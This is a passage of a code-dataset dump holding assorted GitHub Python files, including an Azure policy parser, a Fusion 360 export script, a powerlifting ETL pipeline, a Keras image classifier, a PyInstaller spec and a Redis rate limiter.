Management/07-automated-backup.py","file_name":"07-automated-backup.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"71"} +{"seq_id":"6773666687","text":"from ScoutSuite.providers.azure.resources.base import AzureResources\n\n\nclass PolicyAssignments(AzureResources):\n async def fetch_all(self):\n for raw_policy in await self.facade.policies.get_policies_assignments():\n id, policy = self._parse_policy(raw_policy)\n self[id] = policy\n\n def _parse_policy(self, raw_policy):\n policy = {}\n policy['id'] = raw_policy.id\n\n return policy['id'], policy","repo_name":"AboDima/azure","sub_path":"ScoutSuite/providers/azure/resources/policy/policy_assignments.py","file_name":"policy_assignments.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71867718951","text":"import sys\n\ndef run(total):\n global count\n if len(total)==1:\n print(count)\n a=list(map(int,total))\n print(\"NO \"if a[0]%3 else \"YES\")\n sys.exit()\n\n total=sum(map(int,total))\n count+=1\n run(list(str(total)))\n\ninput=sys.stdin.readline\nx=list(input().rstrip())\ncount=0\nrun(x)","repo_name":"HyeBin-Hub/Problem_Solving_Algorithm_","sub_path":"Baekjoon_OJ_Solving_/1769 3의 배수/1769(2).py","file_name":"1769(2).py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3708798961","text":"#Author-Freeman\n#Description-\n\nimport adsk.core, adsk.fusion, traceback\nimport adsk.drawing\nimport time\n\n_app = adsk.core.Application.cast(None)\n_ui = adsk.core.UserInterface.cast(None)\nhandlers = []\n\n_exportPDFFolder = 'C:/Users/scott/Downloads'\n\ndef run(context):\n try:\n global _app, _ui\n _app = adsk.core.Application.get()\n _ui = _app.userInterface\n docs = _app.documents\n # get f2d datafile\n datafile = None\n for df in docs:\n if df.dataFile.fileExtension == 'f2d':\n datafile = df.dataFile\n\n # check datafile\n if not datafile:\n _ui.messageBox('Abort because the \"f2d\" file cannot be found in the open documents.')\n return\n\n # open doc\n drawDoc :adsk.drawing.DrawingDocument = docs.open(datafile)\n\n # Tasks to be checked.\n targetTasks = [\n 'DocumentFullyOpenedTask',\n 'Nu::AnalyticsTask',\n 'CheckValidationTask',\n 'InvalidateCommandsTask'\n ]\n\n # check start task\n if not targetTasks[0] in getTaskList():\n _ui.messageBox('Task not found : {}'.format(targetTasks[0]))\n return\n\n # Check the task and determine if the Document is Open.\n for targetTask in targetTasks:\n while True:\n time.sleep(0.1)\n if not targetTask in getTaskList():\n break\n\n # export PDF\n expPDFpath = _exportPDFFolder + drawDoc.name + '.pdf'\n\n draw :adsk.drawing.Drawing = drawDoc.drawing\n pdfExpMgr :adsk.drawing.DrawingExportManager = draw.exportManager\n\n pdfExpOpt :adsk.drawing.DrawingExportOptions = pdfExpMgr.createPDFExportOptions(expPDFpath)\n pdfExpOpt.openPDF = True\n pdfExpOpt.useLineWeights = True\n\n pdfExpMgr.execute(pdfExpOpt)\n\n # close doc\n drawDoc.close(False)\n\n except:\n if _ui:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n\ndef getTaskList():\n adsk.doEvents()\n tasks = _app.executeTextCommand(u'Application.ListIdleTasks').split('\\n')\n return [s.strip() for s in tasks[2:-1]]\n","repo_name":"Aeronavics/vigilant-disco","sub_path":"Scripts/DrawingBatchExport/DrawingBatchExport.py","file_name":"DrawingBatchExport.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11974434683","text":"from random import randint as losuj\nfrom turtle import fd, rt, pu, tracer, update, fillcolor, begin_fill, end_fill, goto\n\nkolory = ['green', (0.5, 1, 0) , 'yellow', 'orange', 'red', (0.5, 0,0) ]\n\nwiersz = [0 for i in range(100)]\nmapa = [[] + wiersz for i in range(100)]\n\ndef kwadrat (kolor):\n fillcolor(kolor)\n begin_fill()\n for i in range(4):\n fd(5)\n rt(90)\n end_fill()\n\ndef srednia (x,y):\n srednia = mapa[x][y]\n mianownik = 1\n gora = 0\n dol = 0\n lewo = 0\n prawo = 0\n if x < 99:\n prawo = 1\n if x > 0:\n lewo = 1\n if y < 99:\n gora = 1\n if y > 0:\n dol = 1\n if prawo == 1:\n srednia += mapa[x+1][y] *2\n mianownik += 2\n if lewo == 1:\n srednia += mapa[x-1][y] *2\n mianownik += 2\n if gora == 1:\n srednia += mapa[x][y+1] *2\n mianownik += 2\n if dol == 1:\n srednia += mapa[x][y-1] *2\n mianownik += 2\n if gora == 1 and prawo == 1:\n srednia += mapa[x+1][y+1]\n mianownik += 1\n if gora == 1 and lewo == 1:\n srednia += mapa[x-1][y+1]\n mianownik += 1\n if dol == 1 and prawo == 1:\n srednia += mapa[x+1][y-1]\n mianownik += 1\n if dol == 1 and lewo == 1:\n srednia += mapa[x-1][y-1]\n mianownik += 1\n #srednia += mapa[x-1][y] + mapa[x-1][y-1] + mapa[x][y-1] + mapa[x+1][y-1] + mapa[x-1][y+1] + mapa[x+1][y] + mapa[x][y+1] + mapa[x+1][y+1]\n return srednia / mianownik\n\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\n\n#generowanie mapy\n\nfor i in range(1000000):\n x = losuj(0,99)\n y = losuj(0,99)\n mapa[x][y] = srednia(x,y)\n \n#print (mapa)\n\n#generowanie sredniej\n\nsrednia = 0\nfor i in range(100):\n for j in range(100):\n srednia += mapa[i][j]\n\nsrednia /= 100*100\nprint(srednia)\n\n#odchylenie standardowe\n'''\nro = 0\nsuma_ro = 0\n\nfor i in range(100):\n for j in range(100):\n suma_ro += (mapa[i][j] - srednia)**2\n\nro = (suma_ro / 100*100) ** (1/2)\nprint(ro)\n\n#print(max(max(mapa)),min(min(mapa)))\n'''\n#prepisywanie mapy na kolory\n\nfor i in range(100):\n for j in range(100):\n if mapa[i][j] <= srednia/100:\n mapa[i][j] = 1\n elif mapa[i][j] <= srednia/9:\n mapa[i][j] = 2\n elif mapa[i][j] <= srednia:\n mapa[i][j] = 3\n elif mapa[i][j] <= 3*srednia:\n mapa[i][j] = 4\n elif mapa[i][j] <= 6*srednia:\n mapa[i][j] = 5\n else:\n mapa[i][j] = 6\n\n#print(mapa)\n\n#rysowanie\ntracer(0,1)\npu()\n#goto(-10000,-10000)\n\nfor i in range(100):\n for j in range(100):\n goto((i-25)*5,(j-25)*5)\n kwadrat(kolory[mapa[i][j]-1])\n\nupdate()\ninput()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mikikora/University","sub_path":"python/python_lista8/prog4.py","file_name":"prog4.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13765243091","text":"from lxml import html\nimport re\nimport psycopg2\nfrom psycopg2.extras import DictCursor\nimport os\nimport asyncio\nimport aiohttp\nimport async_timeout\nfrom urllib.parse import urljoin\nfrom typing import *\nfrom itertools import chain\n\n\nasync def fetch_classutil_page(session: aiohttp.ClientSession, page_url: str):\n with async_timeout.timeout(10):\n async with session.get(page_url) as response:\n response_bytes = await response.content.read()\n\n print(\"Fetched: {}\".format(page_url))\n return response_bytes\n\n\nasync def main():\n pg_conn = psycopg2.connect(os.environ[\"DATABASE_URL\"])\n pg_conn.set_session(autocommit=True)\n\n async with aiohttp.ClientSession() as session:\n index_urls = await fetch_classutil_index(session)\n\n tasks = []\n for page_url in index_urls:\n task = asyncio.ensure_future(fetch_classutil_page(session, page_url))\n tasks.append(task)\n responses = await asyncio.gather(*tasks)\n\n tasks = []\n for response in responses:\n task = asyncio.ensure_future(process_classutil_page(response))\n tasks.append(task)\n scrapes = await asyncio.gather(*tasks) # Nested list of scrapes per page\n scrapes = list(chain.from_iterable(scrapes)) # Flatten\n\n await process_scrapes_batch(pg_conn, scrapes)\n\n pg_conn.close()\n\n\nif __name__ == '__main__':\n # Note, that the loop here is a global loop\n # Thus, when you 'schedule' a task through ensure_future or similar,\n # it automatically assumes usage of this global loop.\n #\n # So, a 'task' represents a coroutine that's scheduled to execute eventually.\n # So a Future is similar to a Promise. The only difference being: A promise's lifecycle\n # and scheduling is handled by the Javascript engine; the Future's lifecycle and scheduling\n # is handled by this asyncio loop here.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"unswsecsoc/buried-deep","sub_path":"api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"1861317720","text":"### This Script Extracts Impedance Data from an Ec_Lab ouput .mpt to and creates a corresponding csv file ###\n\n#For command line commands\nimport os\n\n#For data handling\nimport pandas as pd\n\n#For working with strings\nimport re\n\n#Get the files to be measured\nHomeFiles=os.listdir()\nImpedanceFiles = []\n\npattern = re.compile(\".mpt$\") # Compile a regex\nfor line in HomeFiles:\n if pattern.search(line) != None: # If a match is found \n ImpedanceFiles.append(line)\n\nfor line in ImpedanceFiles:\n file=open(line, 'r', encoding='cp1252')\n F = []\n R = []\n Im = []\n\n for thing in file.readlines()[60:]:\n fields = thing.split()\n if float(fields[2])>=0:\n F = F + [float(fields[0])]\n R = R + [float(fields[1])]\n Im = Im + [-float(fields[2])]\n file.close()\n \n EISdata=list(zip(F, R, Im))\n df = pd.DataFrame(data = EISdata, columns=['Frequency', 'R(ohmcm^2)','Im(ohmcm^2)'])\n namesplit = line.split(\".\")\n outfilename = namesplit[0] + \".csv\" \n df.to_csv(outfilename,index=False,header=True)\n","repo_name":"hailegroup/ECIF","sub_path":"main/Batch/EC_File_Converter.py","file_name":"EC_File_Converter.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"23926053573","text":"import ifcopenshell.util.date\n\n\nclass Usecase:\n def __init__(self, file, work_schedule=None, attributes=None):\n \"\"\"Edits the attributes of an IfcWorkSchedule\n\n For more information about the attributes and data types of an\n IfcWorkSchedule, consult the IFC documentation.\n\n :param work_schedule: The IfcWorkSchedule entity you want to edit\n :type work_schedule: ifcopenshell.entity_instance.entity_instance\n :param attributes: a dictionary of attribute names and values.\n :type attributes: dict, optional\n :return: None\n :rtype: None\n\n Example:\n\n .. code:: python\n\n # This will hold all our construction schedules\n work_plan = ifcopenshell.api.run(\"sequence.add_work_plan\", model, name=\"Construction\")\n\n # Let's imagine this is one of our schedules in our work plan.\n schedule = ifcopenshell.api.run(\"sequence.add_work_schedule\", model,\n name=\"Construction Schedule A\", work_plan=work_plan)\n\n # Let's give it a description\n ifcopenshell.api.run(\"sequence.edit_work_schedule\", model,\n work_schedule=work_schedule, attributes={\"Description\": \"3 crane design option\"})\n \"\"\"\n self.file = file\n self.settings = {\"work_schedule\": work_schedule, \"attributes\": attributes or {}}\n\n def execute(self):\n for name, value in self.settings[\"attributes\"].items():\n if value:\n if \"Date\" in name or \"Time\" in name:\n value = ifcopenshell.util.date.datetime2ifc(value, \"IfcDateTime\")\n elif name == \"Duration\" or name == \"TotalFloat\":\n value = ifcopenshell.util.date.datetime2ifc(value, \"IfcDuration\")\n setattr(self.settings[\"work_schedule\"], name, value)\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/sequence/edit_work_schedule.py","file_name":"edit_work_schedule.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"15411396566","text":"import PySimpleGUI as sg\r\nimport sqlite3\r\nsg.theme(\"LightGrey3\")\r\n\r\nconn = sqlite3.connect(\"randi.db\")\r\nc = conn.cursor()\r\nc.execute(\"CREATE TABLE IF NOT EXISTS tb(nev TEXT, telefonszam TEXT, eletkor INTEGER)\")\r\nconn.commit()\r\n\r\ncol1=[\r\n\r\n [sg.Text('Név:' )],\r\n [sg.Text('Telefonszám:' )],\r\n [sg.Text('Életkor:' )],\r\n [sg.Button('Keres')]\r\n ]\r\n\r\ncol2=[\r\n\r\n [sg.Input(key='Név')],\r\n [sg.Input(key='Telefonszám')],\r\n [sg.Input(key='Életkor')],\r\n [sg.Button('Ment')]\r\n ]\r\n\r\nlayout= [\r\n [sg.Column(col1),sg.Column(col2)]\r\n ]\r\n\r\n\r\nwindow = sg.Window(\"Randi\",layout)\r\n\r\nwhile True:\r\n event, values = window.read()\r\n print(event, values)\r\n if event in (None, \"Exit\"):\r\n break\r\n \r\n if event in (\"Ment\"):\r\n nev = values['Név']\r\n telefonszam = values['Telefonszám']\r\n eletkor = values['Életkor']\r\n c.execute(\"INSERT INTO tb VALUES(?,?,?)\",(nev,telefonszam,eletkor))\r\n conn.commit()\r\n \r\n if event in (\"Keres\"):\r\n nev = values['Név']\r\n telefonszam = values['Telefonszám']\r\n eletkor = values['Életkor']\r\n c.execute(\"SELECT * FROM tb WHERE nev LIKE ?\",(nev,))\r\n eredmeny=c.fetchall()\r\n nev=eredmeny[0][0]\r\n telefonszam=eredmeny[0][1]\r\n eletkor=eredmeny[0][2]\r\n window['Név'].update(nev)\r\n window['Telefonszám'].update(telefonszam)\r\n window['Életkor'].update(eletkor)\r\n \r\n print(eredmeny)","repo_name":"tamasjuhasz84/randi","sub_path":"randi.py","file_name":"randi.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36970963684","text":"import glob\nimport csv\nimport pandas as pd\nimport psycopg2\nfrom sqlalchemy import create_engine\n\n\ndef combine_columns(row):\n return f\"{row['country']}.{row['state']}.{row['town']}\"\n\n\ndef insert_frame(df, table_name):\n db = create_engine(\"postgresql://student:student@127.0.0.1/studentdb\")\n conn = db.connect()\n\n # Insert into Database\n df.to_sql(con=conn, name=table_name, index=False, if_exists=\"append\")\n\n conn.close()\n\n\ndef load_table(table_name):\n db = create_engine(\"postgresql://student:student@127.0.0.1/studentdb\")\n conn = db.connect()\n\n sql_query = f\"SELECT * FROM {table_name}\"\n\n df = pd.read_sql(sql_query, conn)\n\n return df\n\n\ndef lookup_contest_id(row, lookup):\n key = f\"{row['name']}.{row['date']}\"\n return lookup[key]\n\n\ndef handle_contest_results(df, athletes, contests):\n # Rename ids to support foreign keys\n athletes = athletes.rename(columns={\"id\": \"athlete_id\"})\n contests = contests.rename(columns={\"id\": \"contest_id\"})\n\n \"\"\"\n I spent hours trying to merge the df data frame with the contests data frame but I\n kept getting contest_id = NaN for all records. I decided to, instead, go with the \n less elegant but still pretty quick python dictionary to act as a hash map, which\n still has pretty decent speed. Compute power is cheap, developer time is not.\n\n df = df.rename(columns={\"MeetName\": \"name\", \"Date\": \"date\"})\n # Merge Contests\n df = df.merge(contests, on=[\"name\", \"date\"], how=\"left\")\n \n \"\"\"\n contest_id_lookup = {}\n for index, row in contests.iterrows():\n contest_id_lookup[f\"{row['name']}.{row['date']}\"] = row[\"contest_id\"]\n\n df = df.rename(columns={\"MeetName\": \"name\", \"Date\": \"date\"})\n df[\"contest_id\"] = df.apply(lookup_contest_id, axis=1, lookup=contest_id_lookup)\n df = df.drop([\"name\", \"date\"], axis=1)\n\n # Rename for athletes\n df = df.rename(columns={\"Name\": \"name\"})\n df[[\"name\", \"deduplication_number\"]] = df.name.str.split(\" #\", expand=True)\n df.deduplication_number.fillna(value=0, inplace=True)\n\n # Merge Athletes\n df = df.merge(athletes, on=[\"name\", \"deduplication_number\"], how=\"left\")\n\n # Drop Merge Fields\n df = df.drop([\"name\", \"deduplication_number\", \"gender\"], axis=1)\n\n # Rename contest fields\n df = df.rename(\n columns={\n \"Event\": \"event\",\n \"Equipment\": \"equipment\",\n \"Division\": \"division\",\n \"Age\": \"age\",\n \"AgeClass\": \"age_class\",\n \"BirthYearClass\": \"birth_year_class\",\n \"BodyweightKg\": \"bodyweight\",\n \"WeightClassKg\": \"weight_class\",\n \"Best3SquatKg\": \"squat\",\n \"Best3BenchKg\": \"bench_press\",\n \"Best3DeadliftKg\": \"deadlift\",\n \"Place\": \"place\",\n \"TotalKg\": \"meet_total\",\n \"Dots\": \"dots\",\n \"Tested\": \"drug_tested\",\n }\n )\n\n # Normalize Event\n df[\"event\"].replace(\"SBD\", \"FP\", inplace=True)\n df[\"event\"].replace(\"BD\", \"BD\", inplace=True)\n df[\"event\"].replace(\"SD\", \"SD\", inplace=True)\n df[\"event\"].replace(\"SB\", \"SB\", inplace=True)\n df[\"event\"].replace(\"S\", \"SQ\", inplace=True)\n df[\"event\"].replace(\"B\", \"BP\", inplace=True)\n df[\"event\"].replace(\"D\", \"DL\", inplace=True)\n\n # Normalize Equipment\n df[\"equipment\"].replace(\"Raw\", \"R\", inplace=True)\n df[\"equipment\"].replace(\"Wraps\", \"W\", inplace=True)\n df[\"equipment\"].replace(\"Single-ply\", \"S\", inplace=True)\n df[\"equipment\"].replace(\"Multi-ply\", \"M\", inplace=True)\n df[\"equipment\"].replace(\"Unlimited\", \"U\", inplace=True)\n df[\"equipment\"].replace(\"Straps\", \"T\", inplace=True)\n\n print(\"Pre:\")\n print(df)\n\n # Remove any results without a numeric 'place' - they were either disqualified,\n # no shows, guest lifters, etc.\n df[\"place\"] = pd.to_numeric(df[\"place\"], errors=\"coerce\")\n df = df.dropna(subset=[\"place\"])\n\n # Weight class field includes + symbol representing anything over the weight.\n df[\"weight_class\"] = pd.to_numeric(df[\"weight_class\"], errors=\"coerce\")\n\n df[\"drug_tested\"].replace(\"Yes\", \"True\", inplace=True)\n df[\"drug_tested\"].replace(\"No\", \"False\", inplace=True)\n df[\"drug_tested\"].fillna(value=\"False\", inplace=True)\n\n print(\"Post:\")\n print(df)\n\n # Update database\n insert_frame(df, \"powerlifting_contestresult\")\n\n\ndef handle_contests(df, locations_df):\n # Rename Fields\n df = df.rename(\n columns={\n \"MeetCountry\": \"country\",\n \"MeetState\": \"state\",\n \"MeetTown\": \"town\",\n \"MeetName\": \"name\",\n \"Federation\": \"federation\",\n \"ParentFederation\": \"parent_federation\",\n \"Date\": \"date\",\n }\n )\n\n # Deduplicate\n df = df.drop_duplicates([\"name\", \"date\"])\n\n # Fill in Missing Towns and States with Blank Values\n df.town.fillna(value=\"\", inplace=True)\n df.state.fillna(value=\"\", inplace=True)\n\n # Rename locations\n locations_df = locations_df.rename(columns={\"id\": \"location_id\"})\n\n df = df.merge(locations_df, on=[\"country\", \"town\", \"state\"], how=\"left\")\n\n # Remove unnecessary fields post merge\n df = df.drop([\"country\", \"state\", \"town\"], axis=1)\n\n # Fill in missing values\n df.federation.fillna(value=\"\", inplace=True)\n df.parent_federation.fillna(value=\"\", inplace=True)\n\n # Insert into database\n insert_frame(df, \"powerlifting_contest\")\n\n\ndef handle_athletes(df):\n \"\"\"Transform dataframe containing athlete information and insert into database\"\"\"\n # 'Name' column is deduplicated via # symbol, so, we can drop based on name\n athletes = df.drop_duplicates(\"Name\")\n\n # Rename Name to name and Sex to gender to conform with database fields\n athletes = athletes.rename(columns={\"Name\": \"name\", \"Sex\": \"gender\"})\n\n # Split \"name\" column into \"name\" and \"deduplication_number\"\n try:\n athletes[[\"name\", \"deduplication_number\"]] = athletes.name.str.split(\n \" #\", expand=True\n )\n except:\n athletes[\"deduplication_number\"] = 0\n\n # Transform 'gender' field, replacing \"Mx\" with \"X\", to conform with API Schema\n athletes[\"gender\"].replace(\"Mx\", \"X\", inplace=True)\n\n # If there are 'deduplication_number' fields with no value, replace with 0\n athletes.deduplication_number.fillna(value=0, inplace=True)\n\n insert_frame(athletes, \"powerlifting_athlete\")\n return athletes\n\n\ndef handle_locations(df):\n # Rename fields\n df = df.rename(\n columns={\"MeetCountry\": \"country\", \"MeetState\": \"state\", \"MeetTown\": \"town\"}\n )\n\n # Fill in Missing Towns and States with Blank Values\n df.town.fillna(value=\"\", inplace=True)\n df.state.fillna(value=\"\", inplace=True)\n\n # Create a deduplicating column\n df[\"dedup\"] = df.apply(combine_columns, axis=1)\n\n # Deduplicate Columns\n df = df.drop_duplicates(\"dedup\")\n\n # Drop deduplicating column\n df = df.drop(\"dedup\", axis=1)\n\n # Insert locations into database\n insert_frame(df, \"powerlifting_contestlocation\")\n\n\ndef start():\n dir = \"opl\"\n csv_files = glob.glob(f\"{dir}/**/*.csv\")\n\n # print(csv_files)\n\n athletes_frames = []\n location_frames = []\n contest_frames = []\n contest_result_frames = []\n for csv_fp in csv_files:\n for df in pd.read_csv(csv_fp, chunksize=5000):\n # Create an athletes data frame\n athletes_frames.append(df.loc[:, [\"Name\", \"Sex\"]])\n\n # Create a locations data frame\n location_frames.append(df.loc[:, [\"MeetCountry\", \"MeetState\", \"MeetTown\"]])\n\n # Create a contests data frame\n contest_frames.append(\n df.loc[\n :,\n [\n \"MeetName\",\n \"Federation\",\n \"ParentFederation\",\n \"Date\",\n \"MeetCountry\",\n \"MeetState\",\n \"MeetTown\",\n ],\n ]\n )\n\n # Contest Results\n contest_result_frames.append(\n df.loc[\n :,\n [\n \"MeetName\",\n \"Date\",\n \"Name\",\n \"Event\",\n \"Equipment\",\n \"Tested\",\n \"Division\",\n \"Age\",\n \"AgeClass\",\n \"BirthYearClass\",\n \"BodyweightKg\",\n \"WeightClassKg\",\n \"Best3DeadliftKg\",\n \"Best3SquatKg\",\n \"Best3BenchKg\",\n \"Place\",\n \"TotalKg\",\n \"Dots\",\n ],\n ]\n )\n\n # Insert Athletes\n # handle_athletes(pd.concat(athletes_frames))\n athletes = load_table(\"powerlifting_athlete\")\n\n # Insert Locations\n # handle_locations(pd.concat(location_frames))\n locations = load_table(\"powerlifting_contestlocation\")\n\n # Insert Contests\n # handle_contests(pd.concat(contest_frames), locations)\n contests = load_table(\"powerlifting_contest\")\n\n # Insert Contest Results\n handle_contest_results(pd.concat(contest_result_frames), athletes, contests)\n\n\ndef test():\n df1 = [\n [\"name\", \"date\"],\n [\"Open Tournament\", \"2019-05-11\"],\n [\"World Open Championships\", \"2016-11-14\"],\n ]\n\n\nif __name__ == \"__main__\":\n start()\n # test()\n","repo_name":"rickstc/udacity-data-engineering","sub_path":"capstone/etl/import_pl.py","file_name":"import_pl.py","file_ext":"py","file_size_in_byte":9552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"4066996853","text":"# -*- mode: python -*-\n# TODO: ALERT! Before building, you MUST manually set the PYTHONPATH env-var as follows!\n# WIN Preparation: set PYTHONPATH=\"C:\\Users\\rp\\.virtualenvs\\xi-cam2\\Lib\\site-packages\"\n# WIN Usage: pyinstaller --clean --onefile --noconsole --paths C:\\Windows\\System32\\downlevel Xi-cam.spec\n# OSX Usage: pyinstaller --clean --onefile --noconsole --osx-bundle-identifier gov.lbl.camera.xicam Xi-cam.spec\n\nimport glob, os\nimport distributed\nimport astropy\nimport qtpy # preload qtpy and QApplication so that manager thinks qt is safe\nfrom qtpy import QtWidgets\n\nqapp = QtWidgets.QApplication([])\nfrom xicam.plugins import manager as pluginmanager\nimport xicam.plugins, xicam.core, xicam.gui\nimport qtmodern\nimport pip\nimport PyQt5\nimport dask\nimport site\n\nblock_cipher = None\n\nfrom xicam.gui import static\n\n# Some packages have messy non-py contents; Lets wrangle them!\ndatas_src = [\n path for path in glob.glob(os.path.join(static.__path__[0], \"**/*.*\"), recursive=True) if \"__init__.py\" not in path\n]\ndatas_dst = [os.path.dirname(os.path.relpath(path, static.__path__[0])) for path in datas_src]\n\n# Astropy is a mess of file-based imports; must include source outside of pkg\ndatas_src.append(astropy.__path__[0])\ndatas_dst.append(\"astropy\")\n\n# qtmodern has lots of data files; including source\ndatas_src.append(qtmodern.__path__[0])\ndatas_dst.append(\"qtmodern\")\n\n# pip needs its certs\ndatas_src.append(pip.__path__[0])\ndatas_dst.append(\"pip\")\n\n# PyQt5 needs its binaries\ndatas_src.append(PyQt5.__path__[0])\ndatas_dst.append(\"PyQt5\")\n\n# Dask needs its config yaml\ndatas_src.append(dask.__path__[0])\ndatas_dst.append('dask')\n\n# Distributed needs its yaml\ndatas_src.append(os.path.join(distributed.__path__[0],'distributed.yaml'))\ndatas_dst.append('distributed')\n\npluginmanager.collectPlugins(paths=[xicam.core.__path__[0], xicam.plugins.__path__[0], xicam.gui.__path__[0]])\nplugins = pluginmanager.getAllPlugins()\ndatas_src.extend([plugin.path for plugin in plugins])\ndatas_dst.extend([\"plugins\"] * len(plugins))\n\na = Analysis(['run_xicam.py'],\n pathex=[os.getcwd(),\n 'C:\\\\Windows\\\\System32\\\\downlevel',\n site.getsitepackages()],\n binaries=[],\n datas=zip(datas_src, datas_dst),\n hiddenimports=['pandas._libs.tslibs.timedeltas',\n 'imagecodecs._imagecodecs_lite',\n 'pandas._libs.tslibs.np_datetime',\n 'pandas._libs.tslibs.nattype',\n 'pandas._libs.tslibs',\n 'pandas._libs.skiplist',\n 'numpy.lib',\n 'numpy.lib.recfunctions',\n 'shelve',\n 'requests',\n 'qdarkstyle',\n 'xicam.core.execution',\n 'xicam.plugins.cammart',\n 'xicam.gui.widgets.dynimageview',\n 'compileall',\n 'xicam.gui.windows',\n 'xicam.core',\n 'xicam.plugins',\n 'xicam.gui'\n ],\n hookspath=[],\n runtime_hooks=[],\n excludes=['astropy', 'qtmodern', 'pip', 'PyQt5'], # included in data\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher)\n\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Xi-cam',\n debug=False,\n strip=False,\n upx=True,\n console=True )\n\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n name='Xi-cam')\n","repo_name":"Xi-CAM/Xi-cam","sub_path":"Xi-cam.spec","file_name":"Xi-cam.spec","file_ext":"spec","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"70493342951","text":"\"\"\" non-binary classifier + cnn + imageDataGen \"\"\"\n\nimport silence_tensorflow.auto\nfrom tensorflow import keras\nfrom tuto_utils.util_func import plot_acc_loss\nimport os\n\nbatch_size = 126\nepochs = 20\nstep_train = int(2520/batch_size)\nstep_valid = int(327/batch_size)\n\n\n# ImageDataGenerator classes are in alphabetical order\n\ntrain_datagen = keras.preprocessing.image.ImageDataGenerator(rescale=1./255, rotation_range=40, width_shift_range=.2,\n height_shift_range=.2, shear_range=.2, zoom_range=.2,\n horizontal_flip=True, fill_mode='nearest')\nvalid_datagen = keras.preprocessing.image.ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory('../../DataSets/rps/rps_train', target_size=(150, 150),\n batch_size=batch_size, class_mode='categorical')\nvalid_generator = valid_datagen.flow_from_directory('../../DataSets/rps/rps_test', target_size=(150, 150),\n batch_size=batch_size, class_mode='categorical')\n\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Conv2D(16, 3, activation='relu', input_shape=(150, 150, 3)))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Conv2D(32, 3, activation='relu'))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Conv2D(64, 3, activation='relu'))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Flatten())\nmodel.add(keras.layers.Dropout(.5))\nmodel.add(keras.layers.Dense(512, activation='relu'))\nmodel.add(keras.layers.Dense(3, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=keras.optimizers.RMSprop(lr=.001), metrics=['acc'])\nhistory = model.fit(train_generator, steps_per_epoch=step_train, epochs=epochs,\n validation_data=valid_generator, validation_steps=step_valid)\n\nplot_acc_loss(history)\n\n\n\"\"\"\n20 epochs, no data augment, plateau 80% valid acc\n20 epochs, data augment, 99% valid acc\n\"\"\"\n\n\ndef try_image(path):\n import numpy as np\n img = keras.preprocessing.image.load_img(path, target_size=(150, 150))\n x = keras.preprocessing.image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])\n classes = model.predict(images, batch_size=10)\n print(path)\n print(classes)\n\n\ntry_image('../../DataSets/rps/test_pic/rock3.png')","repo_name":"Lem0nRavioli/tutorial_backup","sub_path":"Coursea/CnnTF/tuto4.py","file_name":"tuto4.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27674388243","text":"import functools\n\nfrom aioredis import Redis\nfrom fastapi import HTTPException\n\nclient = Redis(host=\"redis\")\n\n\nasync def limit(key: str, limit: int = 5, ttl: int = 60) -> dict:\n \"\"\"Basic rate limiter for endpoints.\n Used to limit the amount of calls to endpoints.\n :param key: the key to use to store the calls\n :param limit: the maximum amount of calls allowed during ttl\n :param ttl: the time to live of the calls\n :return: a dictionary with the following keys: call, ttl\n \"\"\"\n req = await client.incr(key)\n if req == 1:\n await client.expire(key, 60)\n ttl = 60\n else:\n ttl = await client.ttl(key)\n if req > limit:\n return {\"call\": False, \"ttl\": 